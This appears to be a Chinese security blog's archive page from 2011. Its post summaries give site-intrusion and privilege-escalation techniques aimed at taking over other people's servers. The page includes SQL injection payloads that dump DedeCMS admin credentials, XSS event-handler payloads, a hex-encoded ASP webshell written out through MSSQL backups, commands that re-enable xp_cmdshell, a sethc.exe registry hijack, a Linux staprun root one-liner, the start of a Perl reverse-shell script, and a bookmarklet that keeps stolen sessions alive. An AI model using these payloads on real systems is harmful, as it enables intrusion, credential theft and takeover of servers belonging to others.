2011年4月27日

入侵常用vbs提权

摘要: 3389端口查询 Dim ReadComputerName Set ReadComputerName=WScript.CreateObject("WScript.Shell") Dim TSName,TSRegPath TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" TSName=ReadComputerName.RegRead(TSRegPath) WScript.Echo("TermService 阅读全文

posted @ 2011-04-27 13:12 小宝哥哥 阅读(657) 评论(0) 推荐(1)

命令行下操作注册表劫持sethc提权

摘要: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"/v debugger /d taskmgr.exe /fWindows 控制台注册表工具 - 版本 3.0格式就是:REG Operation 参数列表返回代码: 0 - 成功 1 - 失败 (除了 REG COMPARE)Operation 有11个,可以这样得到帮助:REG Operation /?REG QUERYREG ADDREG DELETEREG COPYREG S 阅读全文

posted @ 2011-04-27 13:06 小宝哥哥 阅读(725) 评论(0) 推荐(0)

星外虚拟主机可写目录总结

摘要: C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\C:\php\PEAR\C:\Program Files\Zend\ZendOptimizer-3.3.0\ C:\Program Files\Common Files\C:\7i24.com\iissafe\log\ C:\RECYCLERC:\windows\temp\ c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\e:\recycler\f:\recycler\C:\P 阅读全文

posted @ 2011-04-27 12:37 小宝哥哥 阅读(243) 评论(0) 推荐(0)

辛苦整理的各类网站系统暴物理路径漏洞

摘要: Phpmyadmin暴路径:phpmyadmin/libraries/select_lang.lib.php 得到物理路径phpmyadmin/themes/darkblue_orange/layout.inc.phpphpmyadmin/index.php?lang[]=1phpMyAdmin/phpinfo.phpphpmyadmin/libraries/mcrypt.lib.phpphpmyadmin/libraries/export/xls.phpphpmyadmin/libraries/lect_lang.lib.phpPhpmyadmin最新重定向漏洞:error.php?type 阅读全文

posted @ 2011-04-27 04:02 小宝哥哥 阅读(2323) 评论(0) 推荐(1)

google hack渗透全过程

摘要: 利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。------------------------------------------------首先用google先看这个站点的一些基本情况(一些细节部分就略去了):site:xxxx.com从返回的信息中,找到几个该校的几个系院的域名:http//a1.xxxx.comhttp//a2.xxxx.comhttp//a3.xxxx.comhttp//a4.xxxx.com顺便ping了一下,应该是在不同的服务器.学校一般都会有不少好的资料,先看看有什么好东西没site:xxxx.com fi 阅读全文

posted @ 2011-04-27 04:01 小宝哥哥 阅读(900) 评论(0) 推荐(0)

维持Session的另类方法

摘要: 拿到偷到的session登陆后,再地址栏敲入下面代码,即可保证session不被服务器因超时注销.javascript:(function%20sogili()%20%7B%0A%20%20%20%20setInterval(function%20()%20%7B_%20%3D%20new%20XMLHttpRequest%20%7C%7C%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22)%3B_.open(%22GET%22%2C%20location)%3B_.send(null)%3B%7D%2C%2060000)%3B%0A%7D)();这段 阅读全文

posted @ 2011-04-27 03:57 小宝哥哥 阅读(142) 评论(0) 推荐(0)

当网站不能上传asp,asa时

摘要: 当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为:<!--#include file="conn.asp"-->直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦! 并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!原来就是如上所说的,<!--#include file="conn.asp"-->就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内 阅读全文

posted @ 2011-04-27 03:56 小宝哥哥 阅读(825) 评论(0) 推荐(0)

ASP绕过防注入的新思路

摘要: 要想绕过防注入,就要打碎关键字。假如有类似这么一段防注入代码:<%id=request("id")id=replace(id,"and","")··· ··· //过滤其它的危险关键字id=replace(id," ","")id=replace(id,",","")//过滤空格和逗号,这是使用本方法必须的条件%>你还有办法注入吗?以打碎关键字“and"为例,咱大可以这样:t 阅读全文

posted @ 2011-04-27 03:47 小宝哥哥 阅读(606) 评论(0) 推荐(0)

PHP站点渗透常用搜集信息

摘要: 当你看到一个php站点时候除了在google上利用site,filetype等常用办法收集网站物理路径信息的同时不妨尝试一下以下办法,有时候会有意想不到的收获(前面加网站的url): /phpinfo.php *显示php配置信息 /test.php *有些网站管理员架设好php网站的测试页面,里面通常都是phpinfo的信息 /info.php *有些php网站系统自带的,可以显示php配置信息 /help.php *有些php网站目录自带的/ok.php/php.php /setup.php*有些php网站系统安装目录自带的,有时会报错 /install.php /config/phpin 阅读全文

posted @ 2011-04-27 03:44 小宝哥哥 阅读(612) 评论(0) 推荐(0)

DedeCMS注入爆管理员用户密码方法

摘要: 搜索关键词:powered by dedecms首先注册个用户,注册地址:/member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号:/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/* 爆管理员密码/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2, 阅读全文

posted @ 2011-04-27 03:42 小宝哥哥 阅读(578) 评论(0) 推荐(0)

php爆绝对路径的几种方法

摘要: dz 爆绝对路径/uc_server/control/admin/db.php/ucenter/control/admin/db.php/manyou/admincp.php?my_suffix=%0A%0DTOBY57/manyou/userapp.php?%0D%0A=TOBY57WordPress的平台,爆绝对路径的方法是:url/wp-admin/includes/admin.phpurl/wp-content/plugins/akismet/akismet.phpurl/wp-content/plugins/akismet/hello.phpphpMyAdmin暴路径办法:phpMy 阅读全文

posted @ 2011-04-27 03:41 小宝哥哥 阅读(1351) 评论(0) 推荐(1)

php注入基本步骤

摘要: php注入十点基本步骤1、判断是否存在注入,加'、and 1=1、and 1=22、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询3、利用order by 暴字段,在网址后加 order by 10/* 如果返回正常说明字段大于104、再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常报出数字,说明猜到准确字段数。如过滤了空格可以用/**/代替。(可在分别用user()、database()、version()进行替换报出的数字进 阅读全文

posted @ 2011-04-27 03:41 小宝哥哥 阅读(266) 评论(0) 推荐(0)

拿站时的零碎技巧

摘要: 1、对提交的变量做更改刻绕过防注入:例如:asp?nid=1 可更换为 asp?n%69d=1 2、利用load_file()时.当php环境magic_quote设置为on时,所有的单引号.双引号.反斜杠和null字符都会被加上一个反斜杠进行转意.把需要load的内容转换为16禁止即可.形式:0x633A5C626F6F742E696E69 'c:/boot.ini' 阅读全文

posted @ 2011-04-27 03:40 小宝哥哥 阅读(128) 评论(0) 推荐(0)

渗透经典命令

摘要: 1:CMD下修改IP地址c:\netshc:\netsh>interfacec:\netsh\interface>ipc:\netsh\interface\ip>dump 显示配置情况netsh -c interface ip dump >c:\ip.txtnetsh interface ip dump >c:\ip.txtnetsh -f c:\ip.txt2:tasklist /svc 任务列表3:taskkill TASKKILL /F /IM notepad.exe /IM mspaint.exe4:systeminfo 显示系统详细信息 set 系统变量 阅读全文

posted @ 2011-04-27 03:38 小宝哥哥 阅读(270) 评论(0) 推荐(0)

Access库利用后台SQL执行导出webshell渗透

摘要: 今天渗透了一个站点,后台有能执行sql语句的地方,恰好又得到了网站物理路径。以前看到网上有用access导出shell的方法,原理大致和php网站的outfile差不多先将一句话写到数据库中,然后再通过语句写到文件中。这里要将数据表内容导出到一个EXCEL文件中,因为ACCESS数据库不允许导出其他危险格式。我们导出为EXCEL后再利用IIS解析漏洞就可以用客户端连接了需要执行如下操作:(1)create table a (b varchar(50))建立一个有一个b字段的表,表名为a,字段类型为字符,长度为50(2)insert into a (b) values('<%exe 阅读全文

posted @ 2011-04-27 03:36 小宝哥哥 阅读(358) 评论(0) 推荐(0)

盲注技术讲解

摘要: 判断版本号 http://www.xxx.net/goods.php?id=352&wsid=1%20and%20(1,1)>(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23判断系统http://www.xxx.net/goods.php?id=352&wsid=1%20and%20(1,1)>(select 阅读全文

posted @ 2011-04-27 03:33 小宝哥哥 阅读(198) 评论(0) 推荐(0)

.net最新提权0day,通杀windows

摘要: ps:这个可以一次编译成功,不用改啦……来自:http://www.exploit-db.com/exploits/16940/exploit-db比较厚道的,不在编译上难为小菜啦……/*# Exploit Title: .NET Runtime Optimization Service Privilege Escalation# Date: 03-07-2011# Author: XenoMuta <xenomuta@tuxfamily.org># Version: v2.0.50727# Tested on: Windows XP (sp3), 2003 R2, 7# CVE 阅读全文

posted @ 2011-04-27 03:31 小宝哥哥 阅读(446) 评论(0) 推荐(0)

xp_hello.dll(sa) 提权工具

摘要: 主要代码:在VC6里面新建一个储存过程项目,在proc.cpp中写入如下代码:#include <stdafx.h>#include <shellapi.h>#define XP_NOERROR 0#define XP_ERROR 1#define MAXCOLNAME 25#define MAXNAME 25#define MAXTEXT 255#ifdef __cplusplusextern “C” {#endifRETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc);#ifdef __cplusplus} 阅读全文

posted @ 2011-04-27 03:27 小宝哥哥 阅读(267) 评论(0) 推荐(0)

32个触发事件XSS语句的总结

摘要: 1、onmouseenter:当鼠标进入选区执行代码<div style="background-color:red" onmouseenter="alert('bem')">123456</div>2、onmouseleave:当鼠标离开选区执行代码<DIV onmouseleave="alert('bem')" style="BACKGROUND-COLOR: red">123456</DIV>3、onmousewheel:当鼠标在 阅读全文

posted @ 2011-04-27 03:18 小宝哥哥 阅读(599) 评论(0) 推荐(0)

特殊的TXT挂马

摘要: 我们平常挂马无外乎就那么几种方式,如框架挂马、js挂马、css挂马.txt不是文本文件吗?它如何挂马?且听我慢慢道来,很简单的说.如果有人给你发个一个类似http://www.safeclub.tk/test.txt的链接,你敢不敢打开?如果你觉得这只是一个txt文件,打开就打开,没有什么好怕的,那是因为你还没听说过txt文件挂马,如果你听说过,那么你就不会这么大胆了.我们把以下代码保存为test.txtPS:为了显示,所以把width,height的值才设的那么大的.真正挂马的话最好设成0然后把test.txt上传到web空间中,访问一下.这可能要算浏览器的一个小BUG,在txt文件中只要加 阅读全文

posted @ 2011-04-27 02:59 小宝哥哥 阅读(223) 评论(0) 推荐(0)

dos命令全集---建议收藏

摘要: #1 一:net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H: 阅读全文

posted @ 2011-04-27 02:57 小宝哥哥 阅读(187) 评论(0) 推荐(0)

2011黑帽安全大会的精彩点滴

摘要: 黒帽安全大会总是千奇百怪,来自世界各地的每一位安全爱好者都会想尽办法用其安全特技向世人展示网络安全世界的种种不足。下面,我简要为大家介绍2011黒帽安全大会的一些精彩点滴:1、32岁卢森堡大学博士研究员Ralf-Philipp Weinmann通过其笔记本电脑/假扮GSM基站,通过发送短信成功诱使iPhone用户访问其钓鱼网站。虽然没有按计划完整展示该攻击的全过程,但 Weinmann也同样对成功攻破iPhone 感到惊讶。这一发现无疑又增添了手机入侵的新方法。手机的无线通信是通过手机信号发射塔进行的,在Weinmann的研究中,他需要首先建立虚假信号发射塔,然后保证目标电话连接到该发射塔。只 阅读全文

posted @ 2011-04-27 02:52 小宝哥哥 阅读(143) 评论(0) 推荐(0)

用彩虹表破解MD5、LM Hash等复杂加密密码

摘要: 一、什么是彩虹表?彩虹表(Rainbow Tables)就是一个庞大的、针对各种可能的字母组合预先计算好的哈希值的集合,不一定是针对MD5算法的,各种算法的都有,有了它可以快速的破解各类密码。越是复杂的密码,需要的彩虹表就越大,现在主流的彩虹表都是100G以上。二、上哪找彩虹表去?现在有很多大牛已经把自己的彩虹表共享出来了,所以你可以去下载。还有一种方法就是自己通过工具生成。不过自己生成有点不切合实际,生成小的彩虹表吧数据少,可以破解密码的位数少(复杂程度低),而且费时费力,4核4GB内存的机器,生成2GB彩虹表,需要花费7天时间,而7天按1MB的带宽(160K/S左右)几乎可以下载30GB左 阅读全文

posted @ 2011-04-27 02:49 小宝哥哥 阅读(1040) 评论(0) 推荐(0)

SA权限沙盒模式提权方法

摘要: sa下删除xp_cmdshell和xplog70.dll时候的一种办法,不算新的了,也被一些人不断的再次提出来,为了方便自己记忆再写出来,在这种情况下,要执行命令,条件是要有xp_regwrite。首先开启沙盘模式:exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1然后利用jet.oledb执行系统命令select * from openrowset('m 阅读全文

posted @ 2011-04-27 02:44 小宝哥哥 阅读(515) 评论(0) 推荐(0)

SQL入侵恢复XP_CMDSHLL与开3389

摘要: 一,用SQL连接器恢复XP_CMDSHLLE的命令(1)sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'去除sp_dropextendedproc 'xp_cmdshell'(3)MSSQL2000sp_addextendedproc 'xp_cmdshell', 阅读全文

posted @ 2011-04-27 02:43 小宝哥哥 阅读(417) 评论(0) 推荐(0)

SQL注入的不常见方法

摘要: 大家在是否碰到过这样的站点:全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担,提高访问速度。二来也阻止了SQL注入式的攻击。。我来说说他们的文章系统原理:全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。攻击方法:查看源文件/看里面是否有通过JS来调用的页面。如调用<script language="javascript" src="count.asp?id=1552"></script>来更新文章的浏览次数。我们就可以这样来试一下可否注入:http://服务器域名/count 阅读全文

posted @ 2011-04-27 02:31 小宝哥哥 阅读(158) 评论(0) 推荐(0)

MSsql差异备份总结

摘要: .完整备份一次(保存位置当然可以改)backup database 库名 to disk = 'c:\ddd.bak';--2.创建表并插曲入数据create table [dbo].[dtest] ([cmd] [image]);insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--3.进行差异备份backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--上面0x3C2 阅读全文

posted @ 2011-04-27 02:30 小宝哥哥 阅读(547) 评论(0) 推荐(0)

Linux下提权反弹脚本

摘要: linux下提权反弹脚本!代码如下#!/usr/bin/perl -w#use strict;use Socket;use IO::Handle;if($#ARGV+1 != 2){ print "$#ARGV $0 Remote_IP Remote_Port \n"; exit 1;}my $remote_ip = $ARGV[0];my $remote_port = $ARGV[1];my $proto = getprotobyname("tcp");my $pack_addr = sockaddr_in($remote_port, inet_ato 阅读全文

posted @ 2011-04-27 02:25 小宝哥哥 阅读(474) 评论(0) 推荐(0)

Ws2Help.dll提权工具

摘要: http://files.cnblogs.com/baogg/ws2help.dll.rar原理:劫持一个重要的系统函数,执行任意代码。使用方法:用于webshell提权,一般来说只要放到有网络行为的程序目录下就可以。最好是有自升级功能的,例如QQ、迅雷、BT、杀毒软件,输入法等,输入法目录一般权限较低,比较好利用。运行后会导致系统执行创建用户。(注意:应用系统版本需小于vista)需要创建的用户名和密码可以十六进制修改。一个程序的启动它会调用很多dll或者ocx组件,但是他是有一个顺序的。比如这个迅雷,他启动时会调用Ws2Help.dll这个组件,一般的情况,这个组件是我们的windows默 阅读全文

posted @ 2011-04-27 02:24 小宝哥哥 阅读(297) 评论(0) 推荐(0)

无wscript.shell组件提权又一个方法

摘要: <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if res 阅读全文

posted @ 2011-04-27 02:22 小宝哥哥 阅读(294) 评论(0) 推荐(0)

linux一句话提权

摘要: 不多说,看命令:‍[b@fuckks~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTI*****="-C exploit.conf" staprun -u whatever sh-3.2# uname -aLinux xlsec 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:43 EDT 2010 i686 i686 i386 GNU/Linuxsh-3.2# cat /etc/redhat-release Red Hat Enterp 阅读全文

posted @ 2011-04-27 02:13 小宝哥哥 阅读(848) 评论(0) 推荐(0)

破解mysql hash 提权技巧

摘要: mssql的hash保存在表master.dbo.sysxlogins中,用select name,password from master.dbo.sysxlogins可以提取用户hash0x01004E04BE46023057E323AF27269E5B7DDCA140C98D225BDD3D06E8EFE8CFAEC02985B27B38059FA3B18349612B分解:常量部分:0×0100Salt部分:4E04BE46混合密文:023057E323AF27269E5B7DDCA140C98D225BDD3D大写字母密文:06E8EFE8CFAEC02985B27B380 阅读全文

posted @ 2011-04-27 02:12 小宝哥哥 阅读(1228) 评论(0) 推荐(0)

导航

Tasup